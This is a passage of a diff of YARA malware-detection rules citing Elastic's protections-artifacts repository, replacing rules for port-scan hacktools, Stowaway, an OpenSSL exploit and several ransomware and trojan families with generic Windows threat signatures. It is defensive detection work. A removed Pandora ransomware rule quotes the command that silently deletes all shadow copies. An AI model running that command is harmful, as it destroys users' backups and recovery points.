"https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "3fc821b63dfa653b86b11201073997fa4dc273124d050c2a7c267ac789d8a447" + logic_hash = "73cabad0656c6b347def017b07138fdbdd5b41da5ccf7d701fea764669058f39" score = 75 quality = 75 - tags = "FILE" - fingerprint = "cebca7dc572afccf4eb600980b9cbaef0878213f91c04b4605a0cf4d0e5e541f" + tags = "FILE, MEMORY" + fingerprint = "2de0d43a4c1c4b3ecef7272d3f224bd5203c130365ff49a02a9200b3f53fe6ba" severity = 50 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $str1 = "\\Device\\RTCore64" wide fullword - $str2 = "Kaspersky Lab Anti-Rootkit Monitor Driver" wide fullword + $a1 = { 28 00 00 0A 20 B8 0B 00 00 20 10 27 00 00 6F 29 00 00 0A 28 1F 00 00 0A 7E 0D 00 00 04 2D 0A 28 23 00 00 06 28 19 00 00 06 7E 14 00 00 04 6F 2A 00 00 0A 26 17 2D C8 2A 13 30 01 00 41 00 00 00 } condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and $str1 and not $str2 + all of them } -rule ELASTIC_Linux_Hacktool_Portscan_A40C7Ef0 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_803Feff4 : FILE MEMORY { meta: - description = "Detects Linux Hacktool Portscan (Linux.Hacktool.Portscan)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "a40c7ef0-627c-4965-b4d3-b05b79586170" - date = "2021-01-12" - modified = "2021-09-16" + id = "803feff4-e4c2-4d8c-b736-47bb10fd5ce8" + date = "2024-01-17" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Hacktool_Portscan.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "c389c42bac5d4261dbca50c848f22c701df4c9a2c5877dc01e2eaa81300bdc29" - logic_hash = "6118ea86d628450e79ee658f4b95bae40080764a25240698d8ca7fcb7e6adaaf" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L1464-L1482" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "8f150dfb13e4a2ff36231f873e4c0677b5db4aa235d8f0aeb41e02f7e31c1e05" + logic_hash = "e22b8b208ff104e2843d897c425467f2f0ec0c586c4db578da90aeaef0209e1d" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "bf686c3c313936a144265cbf75850c8aee3af3ae36cb571050c7fceed385451d" - severity = 100 + fingerprint = "3bbb00aa18086ac804f6ddf99a50821744a420f46b6361841b8bcd2872e597f1" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 54 50 44 00 52 65 73 70 6F 6E 73 65 20 77 61 73 20 4E 54 50 20 } + $a1 = { 6F 01 00 06 6F 25 00 00 0A 02 7B 03 00 00 04 73 8D 01 00 06 6F 25 00 00 0A 02 7B 03 00 00 04 73 92 01 00 06 6F 25 00 00 0A 02 7B 03 00 00 04 73 9A 01 00 06 6F 25 00 00 0A 02 7B 03 00 00 04 73 } condition: all of them } -rule ELASTIC_Linux_Hacktool_Portscan_6C6000C2 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_9C7D2333 : FILE MEMORY { meta: - description = "Detects Linux Hacktool Portscan (Linux.Hacktool.Portscan)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "6c6000c2-7e9a-457c-a745-00a3ac83a4bc" - date = "2021-01-12" - modified = "2021-09-16" + id = "9c7d2333-f2c4-4d90-95ce-d817da5cb2a3" + date = "2024-01-17" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Hacktool_Portscan.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "8877009fc8ee27ba3b35a7680b80d21c84ee7296bcabe1de51aeeafcc8978da7" - logic_hash = "0cae81cbc0fdf48b4e7ac09865f05e2ad93d79b7a6f1af76a632727127ab050f" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L1484-L1502" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "85219f1402c88ab1e69aa99fe4bed75b2ad1918f4e95c448cdc6a4b9d2f9a5d4" + logic_hash = "561290ebf3ca2a01914f514d63121be930e7a8c06cfc90ff4b8f0c7cef3408fe" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "3c893aebe688d70aebcb15fdc0d2780d2ec0589084c915ff71519ec29e5017f1" - severity = 100 + fingerprint = "3f003cc34b797887b5bbfeb729441d7fdb537d4516f13b215e1f6eceb5a8afaf" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 30 B9 0E 00 00 00 4C 89 D7 F3 A6 0F 97 C2 80 DA 00 84 D2 45 0F } + $a1 = { 55 8B EC 81 EC 64 09 00 00 57 C6 85 00 F8 FF FF 00 B9 FF 00 00 00 33 C0 8D BD 01 F8 FF FF F3 AB 66 AB AA C6 85 00 FC FF FF 00 B9 FF 00 00 00 33 C0 8D BD 01 FC FF FF F3 AB 66 AB AA C7 85 AC F6 } condition: all of them } -rule ELASTIC_Linux_Hacktool_Portscan_E191222D : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_747B58Af : FILE MEMORY { meta: - description = "Detects Linux Hacktool Portscan (Linux.Hacktool.Portscan)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "e191222d-633a-4408-9a54-a70bb9e89cc0" - date = "2021-01-12" - modified = "2021-09-16" + id = "747b58af-6edb-42f2-8a1b-e462399ef61e" + date = "2024-01-17" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Hacktool_Portscan.yar#L41-L59" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "e2f4313538c3ef23adbfc50f37451c318bfd1ffd0e5aaa346cce4cc37417f812" - logic_hash = "6ffb2add4a76214ffd555cf1fe356371acd3638216094097b355670ecfe02ecd" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L1504-L1524" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "ee28e93412c59d63155fd79bc99979a5664c48dcb3c77e121d17fa985fcb0ebe" + logic_hash = "fd6b36ca50c1017035474b491f716bfb0d53b181fce4b5478a57a1d1a6ddc3e7" score = 75 - quality = 75 + quality = 69 tags = "FILE, MEMORY" - fingerprint = "5580dd8b9180b8ff36c7d08a134b1b3782b41054d8b29b23fc5a79e7b0059fd1" - severity = 100 + fingerprint = "79faab4fda6609b2c95d24de92a3a417d2f5e58f3f83c856fa9f32e80bed6f37" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 46 4F 55 4E 44 00 56 41 4C 55 45 00 44 45 4C 45 54 45 44 00 54 } + $a1 = { 5C 43 3D 5D 78 48 73 66 40 22 33 2D 34 } + $a2 = { 79 5A 4E 51 61 4A 21 43 43 56 31 37 74 6B } + $a3 = { 66 72 7A 64 48 49 2D 4E 3A 4D 23 43 } condition: all of them } -rule ELASTIC_Linux_Hacktool_Portscan_E57B0A0C : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_C3C4E847 : FILE MEMORY { meta: - description = "Detects Linux Hacktool Portscan (Linux.Hacktool.Portscan)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "e57b0a0c-66b8-488b-b19d-ae06623645fd" - date = "2021-01-12" - modified = "2021-09-16" + id = "c3c4e847-ef6f-430d-9778-d48326fb4eb0" + date = "2024-01-17" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Hacktool_Portscan.yar#L61-L79" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "f8ee385316b60ee551565876287c06d76ac5765f005ca584d1ca6da13a6eb619" - logic_hash = "b2f67805e9381864591fdf61846284da97f8dd2f5c60484ce9c6e76d2f6f3872" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L1526-L1544" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "86b37f0b2d9d7a810b5739776b4104f1ded3a1228c4ec2d104d26d8eb26aa7ba" + logic_hash = "fa147abf7aa872f409e7684c4c60485fc58f57543062573526e56ff9866f8dfe" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "829c7d271ae475ef06d583148bbdf91af67ce4c7a831da73cc52e8406e7e8f9e" - severity = 100 + fingerprint = "017a8ec014fed493018cff128b973bb648dbb9a0d1bede313d237651d3f6531a" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 10 83 7D 08 03 75 2B 83 EC 0C 8B 45 0C 83 C0 08 FF 30 8B 45 0C 83 } + $a1 = { 2E 3F 41 56 3F 24 5F 52 65 66 5F 63 6F 75 6E 74 40 55 41 70 69 44 61 74 61 40 40 40 73 74 64 40 40 } condition: all of them } -rule ELASTIC_Multi_Hacktool_Stowaway_89F1D452 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_6542Ebda : FILE MEMORY { meta: - description = "Detects Multi Hacktool Stowaway (Multi.Hacktool.Stowaway)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "89f1d452-f40b-47da-ba75-10c90d67c13b" - date = "2024-06-28" - modified = "2024-07-26" + id = "6542ebda-c91e-449e-88c4-244fba69a4b2" + date = "2024-01-17" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Multi_Hacktool_Stowaway.yar#L1-L27" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "c073d3be469c8eea0f007bb37c722bad30e06dc994d3a59773838ed8be154c95" - logic_hash = "c5db1335fea606ec32f7a6540ee4dee637dd2ad5aee27e092b89fa03ad085690" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L1546-L1564" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "2073e51c7db7040c6046e36585873a0addc2bcddeb6e944b46f96c607dd83595" + logic_hash = "30263341bf51a001503dfda9be5771d401bc5b5423682c29a6d4ebc457415d3e" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "313e22009ad758c0dd0977c274eb165511591e3d99a8e2dd4be00622668981da" - severity = 100 - arch_context = "x86, arm64" + fingerprint = "a4ceaf0bf2e8dc3efbc6e41e608816385f40c04984659b0ec15f109b7a6bf20a" + severity = 50 + arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "multi" + os = "windows" strings: - $a1 = "Stowaway/share.ActivePreAuth" ascii fullword - $a2 = "Stowaway/agent/handler" ascii fullword - $a3 = "Origin: http://stowaway:22" ascii fullword - $a4 = "Stowaway/admin.NewAdmin" ascii fullword - $a5 = "Stowaway/global/global.go" ascii fullword - $a6 = "Stowaway/crypto.AESDecrypt" ascii fullword - $a7 = "Stowaway/utils.CheckIfIP4" ascii fullword - $a8 = "Exit Stowaway" - $a9 = "Stowaway/protocol.ConstructMessage" ascii fullword + $a1 = { 55 8B EC 53 56 57 8B F9 85 D2 74 18 0F B7 02 8D 5A 02 0F B7 72 02 8B 4A 04 3B C7 74 0E 83 C2 08 03 D1 75 E8 33 C0 5F 5E 5B 5D C3 B8 78 03 00 00 66 3B F0 74 EF 8B 45 08 89 18 8D 41 06 EB E7 8D } condition: - 3 of them + all of them } -rule ELASTIC_Windows_Trojan_Protects_9F6Eaa90 : FILE +rule ELASTIC_Windows_Generic_Threat_1417511B : FILE MEMORY { meta: - description = "Detects Windows Trojan Protects (Windows.Trojan.ProtectS)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "9f6eaa90-b3d4-4f0f-a81e-8010be0a6d36" - date = "2022-04-04" - modified = "2022-06-09" + id = "1417511b-2b31-47a8-8465-b6a174174863" + date = "2024-01-17" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_ProtectS.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "c0330e072b7003f55a3153ac3e0859369b9c3e22779b113284e95ce1e2ce2099" - logic_hash = "ddc8c97598b2d961dc51bdf2c7ab96abcec63824acd39b767bc175371844c1e5" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L1566-L1584" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "2fc9bd91753ff3334ef7f9861dc1ae79cf5915d79fa50f7104cbb3262b7037da" + logic_hash = "e6b53082fa447ac3cf56784771aca742696922e6f740a24d014e04250dc5020c" score = 75 quality = 75 - tags = "FILE" - fingerprint = "46bf59901876794dcc338923076939d765d3ce7f14d784b9687fbc05461ed6b4" + tags = "FILE, MEMORY" + fingerprint = "4be19360fccf794ca2e53c4f47cd1becf476becf9eafeab430bdb3c64581613c" severity = 50 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $str1 = "\\ProtectS.pdb" + $a1 = { 83 EC 20 8B 45 08 89 45 F4 8B 4D F4 8B 55 08 03 51 3C 89 55 F0 B8 08 00 00 00 6B C8 00 8B 55 F0 8B 45 08 03 44 0A 78 89 45 F8 8B 4D F8 8B 55 08 03 51 20 89 55 EC 8B 45 F8 8B 4D 08 03 } condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and $str1 + all of them } -rule ELASTIC_Linux_Exploit_Openssl_47C6Fad7 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_7526F106 : FILE MEMORY { meta: - description = "Detects Linux Exploit Openssl (Linux.Exploit.Openssl)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "47c6fad7-0582-4a7a-9c51-68830e6b6132" - date = "2021-04-06" - modified = "2021-09-16" + id = "7526f106-018f-41b9-a1bf-15f7d9f2188e" + date = "2024-01-17" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_Openssl.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "8024af0931dff24b5444f0b06a27366a776014358aa0b7fc073030958f863ef8" - logic_hash = "4c60071ecd7b826e692710ae11b09be30e7df5833bcaa8642fea014e12b9abd7" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L1586-L1605" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "5a297c446c27a8d851c444b6b32a346a7f9f5b5e783564742d39e90cd583e0f0" + logic_hash = "a0f9eb760be05196f0c5c3e3bf250929b48341a58a11c24722978fa19c4a9f57" score = 75 - quality = 75 + quality = 71 tags = "FILE, MEMORY" - fingerprint = "bde819830cc991269275ce5de2db50489368c821271aaa397ab914011f2fcb91" - severity = 100 + fingerprint = "5f5fc4152aae94b9c3bc0380dbcb093289c840a29b629b1d76a09c672daa9586" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 31 C9 F7 E1 51 5B B0 A4 CD 80 31 C0 50 68 2F } + $a1 = { 50 72 6F 6A 65 63 74 31 2E 75 45 78 57 61 74 63 68 } + $a2 = { 6C 49 45 4F 62 6A 65 63 74 5F 44 6F 63 75 6D 65 6E 74 43 6F 6D 70 6C 65 74 65 } condition: all of them } -rule ELASTIC_Windows_Ransomware_Doppelpaymer_6660D29F : BETA FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_Cbe3313A : FILE MEMORY { meta: - description = "Identifies DOPPELPAYMER ransomware" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "6660d29f-aca9-4156-90a0-ce64fded281a" - date = "2020-06-28" - modified = "2021-08-23" - reference = "https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Doppelpaymer.yar#L1-L21" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "4c12eaa44f82c6f729e51242c9c1836eb1856959c682e2d2e21b975104c197b6" + id = "cbe3313a-ab8f-4bf1-8f62-b5494c6e7034" + date = "2024-01-17" + modified = "2024-02-08" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L1607-L1625" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "1ca2a28c851070b9bfe1f7dd655f2ea10ececef49276c998a1d2a1b48f84cef3" + logic_hash = "41a731cefe0c8ee95f1db598b68a8860ef7ff06137ce94d0dd0b5c60c4240e85" score = 75 quality = 75 - tags = "BETA, FILE, MEMORY" - fingerprint = "8bf4d098b8ce9da99a2ca13fa0759a7185ade1b3ab3b281cd15749d68546d130" - threat_name = "Windows.Ransomware.Doppelpaymer" - severity = 100 + tags = "FILE, MEMORY" + fingerprint = "dc92cec72728b1df78d79dc5a34ea56ee0b8c8199652c1039288c46859799376" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = "Setup run" wide fullword - $a2 = "RtlComputeCrc32" ascii fullword + $a1 = { 83 EC 08 68 E6 25 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 2C 53 56 57 89 65 F8 C7 45 FC D0 25 40 00 A1 94 B1 41 00 33 F6 3B C6 89 75 EC 89 75 E8 89 75 E4 0F 8E E7 00 00 } condition: - 2 of ($a*) + all of them } -rule ELASTIC_Windows_Ransomware_Doppelpaymer_6Ab188Da : BETA FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_779Cf969 : FILE MEMORY { meta: - description = "Identifies DOPPELPAYMER ransomware" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "6ab188da-4e73-4669-816c-554b2f04ee65" - date = "2020-06-28" - modified = "2021-08-23" - reference = "https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Doppelpaymer.yar#L23-L42" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "429c87d293b7f517a594e8be020cbe7f8302a8b6eb8337f090ca18973aafbde4" + id = "779cf969-d1a0-4280-94cb-c7f62d33482c" + date = "2024-01-17" + modified = "2024-02-08" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L1627-L1645" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "ef281230c248442c804f1930caba48f0ae6cef110665020139f826ab99bbf274" + logic_hash = "ad0f2d78386abf4c6dc6b5a4a88b4dcf8e5bf8086b08bac91e5e00be9936e908" score = 75 - quality = 75 - tags = "BETA, FILE, MEMORY" - fingerprint = "6c33e09e66b337064a1feae5c162f72dc5f6caecaa9829e4ad9fffb10ef3e576" - threat_name = "Windows.Ransomware.Doppelpaymer" - severity = 100 + quality = 73 + tags = "FILE, MEMORY" + fingerprint = "7e089462cc02e2c9861018df71bf5dda6a3a982d3d98b252d44387c937526be4" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $d1 = { 56 55 55 55 F7 EF B8 56 55 55 55 8B EA F7 E9 8B C2 8B D1 C1 FA 1F 2B C2 C1 FF 1F 2B EF 8D 14 40 B8 F3 1A CA 6B 2B CA 03 E9 F7 ED 8B CD C1 FA 05 C1 F9 1F 2B D1 6B CA B4 03 CD 74 1C 81 E1 03 00 00 80 7D 07 83 E9 01 83 C9 FC 41 8B C1 F7 D8 85 C9 8D 7C 05 04 0F 45 EF 8D 44 55 02 5D 5F C3 } + $a1 = { 3E 43 6F 70 79 72 69 67 68 74 20 28 63 29 20 50 79 74 68 6F 6E 20 53 6F 66 74 77 61 72 65 20 46 6F 75 6E 64 61 74 69 6F 6E 2E 20 41 6C 6C 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2E } condition: - 1 of ($d*) + all of them } -rule ELASTIC_Windows_Ransomware_Doppelpaymer_4Fb1A155 : BETA FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_D568682A : FILE MEMORY { meta: - description = "Identifies DOPPELPAYMER ransomware" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "4fb1a155-6448-41e9-829a-e765b7c2570e" - date = "2020-06-28" - modified = "2021-08-23" - reference = "https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Doppelpaymer.yar#L44-L63" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "eb041a836b2bc73312a2f87523d817d5274f3d43d3e5fe6aacfad1399c61a9de" + id = "d568682a-94d2-41e7-88db-f6d6499cbdb2" + date = "2024-01-17" + modified = "2024-02-08" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L1647-L1665" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "0d98bc52259e0625ec2f24078cf4ae3233e5be0ade8f97a80ca590a0f1418582" + logic_hash = "97e172502037c7a5d66327fcc4a237e5548694fc7d73a535838ad56367f15d76" score = 75 quality = 75 - tags = "BETA, FILE, MEMORY" - fingerprint = "f7c1bb3e9d1ad02e7c4edf8accf326330331f92a0f1184bbc19c5bde7505e545" - threat_name = "Windows.Ransomware.Doppelpaymer" - severity = 100 + tags = "FILE, MEMORY" + fingerprint = "2195cf67cdedfe7531591f65127ef800062d88157126393d0a767837a9023632" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $c1 = { 83 EC 64 8B E9 8B 44 24 ?? 8B 00 0F B7 10 83 FA 5C 75 } + $a1 = { 28 00 00 0A 28 22 00 00 0A 80 19 00 00 04 28 53 00 00 06 28 2D 00 00 0A 28 5D 00 00 06 16 80 1D 00 00 04 7E 13 00 00 04 7E 15 00 00 04 16 7E 15 00 00 04 8E B7 16 14 FE 06 5B 00 00 06 73 79 00 } condition: - 1 of ($c*) + all of them } -rule ELASTIC_Windows_Ransomware_Pandora_Bca8Ce23 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_Ccb6A7A2 : FILE MEMORY { meta: - description = "Detects Windows Ransomware Pandora (Windows.Ransomware.Pandora)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "bca8ce23-6722-4cda-b5fa-623eda4fca1b" - date = "2022-03-14" - modified = "2022-04-12" + id = "ccb6a7a2-6003-4ba0-aefc-3605d085486d" + date = "2024-01-17" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Pandora.yar#L1-L21" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "2c940a35025dd3847f7c954a282f65e9c2312d2ada28686f9d1dc73d1c500224" - logic_hash = "52203c1af994667ba6833defe547e886dd02167e4d76c57711080e3be0473bfc" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L1667-L1686" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "60503212db3f27a4d68bbfc94048ffede04ad37c78a19c4fe428b50f27af7a0d" + logic_hash = "312265bbc4330a463bbe7478c70233f5df3353bda3c450562f2414f3675ba91e" score = 75 - quality = 75 + quality = 71 tags = "FILE, MEMORY" - fingerprint = "0da732f6bdf24f35dee3c1bf85435650a5ce9b5c6a93f01176659943c01ad711" - severity = 100 + fingerprint = "a73b0e067fce2e87c08359b4bb2ba947cc276ff0a07ff9e04cabde529e264192" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = "/c vssadmin.exe delete shadows /all /quiet" wide fullword - $a2 = "\\Restore_My_Files.txt" wide fullword - $a3 = ".pandora" wide fullword + $a1 = { 40 52 61 6E 67 65 3A 62 79 74 65 73 3D 30 2D } + $a2 = { 46 49 77 41 36 4B 58 49 75 4E 66 4B 71 49 70 4B 30 4D 57 4D 74 49 38 4B 67 4D 68 49 39 4B 30 4D 53 49 6A 4B 66 4D 73 49 76 4B 75 4D 64 49 70 4B 30 4D 73 49 66 4B 68 4D 6F 49 69 43 6F 4D 6C 49 71 4B } condition: all of them } -rule ELASTIC_Windows_Trojan_Grandoreiro_51236Ba2 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_D62F1D01 : FILE MEMORY { meta: - description = "Grandoreiro rule, target loader and payload" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "51236ba2-fdbc-4c46-b57b-27fc1e135486" - date = "2022-08-23" - modified = "2023-06-13" + id = "d62f1d01-4e24-4a93-85ad-3a3886d5de2f" + date = "2024-01-17" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Grandoreiro.yar#L1-L23" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "1bdf381e7080d9bed3f52f4b3db1991a80d3e58120a5790c3d1609617d1f439e" - logic_hash = "9a8549a1dd82f56458ea8aee5c30243ac073d15c820de28d78a58d2c067b10d6" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L1688-L1706" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "380892397b86f47ec5e6ed1845317bf3fd9c00d01f516cedfe032c0549eef239" + logic_hash = "fd65eb56f3a48c37f83d3544c039d29c231cac1e2f8f07d176d709432a75a4c3" score = 75 